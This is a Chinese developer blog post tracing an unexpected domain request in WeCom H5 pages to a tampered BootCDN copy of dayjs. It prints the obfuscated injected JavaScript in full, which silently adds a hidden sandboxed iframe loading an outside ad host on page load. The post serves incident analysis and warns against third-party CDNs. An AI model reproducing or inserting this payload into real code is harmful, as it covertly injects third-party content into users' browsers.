背景
最近频繁有人反馈在企微里面访问H5应用的时候,出现如下错误。
这个时候就很容易判断出来这个域名应该不是业务发起的,并且也没有配置过微信里面授信域名,那这个域名是怎么出来的呢。
定位
无非就是几种可能性:
- 访问的域名没有在小程序平台配置
- 不是业务js发起的访问。
然后我们经过N此的无痕模式下测试,最后发现了这个请求地址
然后我来就通过禁用这个js请求,发现就不会再有如下的请求地址了。
经过查找发现业务里面引用了一个第三方的js文件
请求地址
bash
https://cdn.bootcss.com/dayjs/1.7.8/dayjs.min.js发现
然后看了下正常情况下资源返回的内容是
非正常返回内容
恶意代码如下
js
var _0x30f682 = _0x2e91;
(function (_0x3a24cc, _0x4f1e43) {
var _0x2f04e2 = _0x2e91, _0x52ac4 = _0x3a24cc();
while (!![]) {
try {
var _0x5e3cb2 = parseInt(_0x2f04e2(0xcc)) / 0x1 * (parseInt(_0x2f04e2(0xd2)) / 0x2) + parseInt(_0x2f04e2(0xb3)) / 0x3 + -parseInt(_0x2f04e2(0xbc)) / 0x4 * (parseInt(_0x2f04e2(0xcd)) / 0x5) + parseInt(_0x2f04e2(0xbd)) / 0x6 * (parseInt(_0x2f04e2(0xc8)) / 0x7) + -parseInt(_0x2f04e2(0xb6)) / 0x8 * (-parseInt(_0x2f04e2(0xb4)) / 0x9) + parseInt(_0x2f04e2(0xb9)) / 0xa * (-parseInt(_0x2f04e2(0xc7)) / 0xb) + parseInt(_0x2f04e2(0xbe)) / 0xc * (-parseInt(_0x2f04e2(0xc5)) / 0xd);
if (_0x5e3cb2 === _0x4f1e43) break; else _0x52ac4['push'](_0x52ac4['shift']());
} catch (_0x4e013c) {
_0x52ac4['push'](_0x52ac4['shift']());
}
}
}(_0xabf8, 0x5b7f0));
var __encode = _0x30f682(0xd5), _a = {}, _0xb483 = [_0x30f682(0xb5), _0x30f682(0xbf)];
(function (_0x352778) {
_0x352778[_0xb483[0x0]] = _0xb483[0x1];
}(_a));
var __Ox10e985 = [_0x30f682(0xcb), _0x30f682(0xce), _0x30f682(0xc0), _0x30f682(0xc3), _0x30f682(0xc9), 'setAttribute', _0x30f682(0xc6), _0x30f682(0xd4), _0x30f682(0xca), _0x30f682(0xd1), _0x30f682(0xd7), _0x30f682(0xb8), _0x30f682(0xb7), _0x30f682(0xd3), 'no-referrer', _0x30f682(0xd6), _0x30f682(0xba), 'appendChild', _0x30f682(0xc4), _0x30f682(0xcf), _0x30f682(0xbb), '删除', _0x30f682(0xd0), '期弹窗,', _0x30f682(0xc1), 'jsjia', _0x30f682(0xc2)];
function _0x2e91(_0x594697, _0x52ccab) {
var _0xabf83b = _0xabf8();
return _0x2e91 = function (_0x2e910a, _0x2d0904) {
_0x2e910a = _0x2e910a - 0xb3;
var _0x5e433b = _0xabf83b[_0x2e910a];
return _0x5e433b;
}, _0x2e91(_0x594697, _0x52ccab);
}
window[__Ox10e985[0x0]] = function () {
var _0x48ab79 = document[__Ox10e985[0x2]](__Ox10e985[0x1]);
_0x48ab79[__Ox10e985[0x5]](__Ox10e985[0x3], __Ox10e985[0x4]), _0x48ab79[__Ox10e985[0x7]][__Ox10e985[0x6]] = __Ox10e985[0x8], _0x48ab79[__Ox10e985[0x7]][__Ox10e985[0x9]] = __Ox10e985[0x8], _0x48ab79[__Ox10e985[0x7]][__Ox10e985[0xa]] = __Ox10e985[0xb], _0x48ab79[__Ox10e985[0x7]][__Ox10e985[0xc]] = __Ox10e985[0x8], _0x48ab79[__Ox10e985[0xd]] = __Ox10e985[0xe], _0x48ab79[__Ox10e985[0xf]] = __Ox10e985[0x10], document[__Ox10e985[0x12]][__Ox10e985[0x11]](_0x48ab79);
}, function (_0x2492c5, _0x10de05, _0x10b59e, _0x49aa51, _0x2cab55, _0x385013) {
_0x385013 = __Ox10e985[0x13], _0x49aa51 = function (_0x2c78b5) {
typeof alert !== _0x385013 && alert(_0x2c78b5);
;typeof console !== _0x385013 && console[__Ox10e985[0x14]](_0x2c78b5);
}, _0x10b59e = function (_0x42b8c7, _0x977cd7) {
return _0x42b8c7 + _0x977cd7;
}, _0x2cab55 = _0x10b59e(__Ox10e985[0x15], _0x10b59e(_0x10b59e(__Ox10e985[0x16], __Ox10e985[0x17]), __Ox10e985[0x18]));
try {
_0x2492c5 = __encode, !(typeof _0x2492c5 !== _0x385013 && _0x2492c5 === _0x10b59e(__Ox10e985[0x19], __Ox10e985[0x1a])) && _0x49aa51(_0x2cab55);
} catch (_0x57c008) {
_0x49aa51(_0x2cab55);
}
}({});
function _0xabf8() {
var _0x503a60 = ['http://www.sojson.com/javascriptobfuscator.html', 'createElement', '还请支持我们的工作', 'mi.com', 'src', 'body', '16721731lEccKs', 'width', '1450515IgSsSQ', '49faOBBE', 'https://www.unionadjs.com/sdk.html', '0px', 'onload', '3031TDvqkk', '5wlfbud', 'iframe', 'undefined', '版本号,js会定', 'height', '394HRogfN', 'referrerPolicy', 'style', 'jsjiami.com', 'sandbox', 'display', '2071497kVsLsw', '711twSQzP', '_decode', '32024UfDDBW', 'frameborder', 'none', '10ZPsgHQ', 'allow-same-origin allow-forms allow-scripts', 'log', '1540476RTPMoy', '492168jwboEb', '12HdquZB'];
_0xabf8 = function () {
return _0x503a60;
};
return _0xabf8();
}通过解析这段代码发现,请求的地址是
arduino
https://www.unionadjs.com/sdk.html原来如此
然后网上搜索了一圈,发现BootCDN还是有被植入后台代码的问题。
zhuanlan.zhihu.com/p/639728142
小结
由此可见,尽量不要第三方的资源仓库。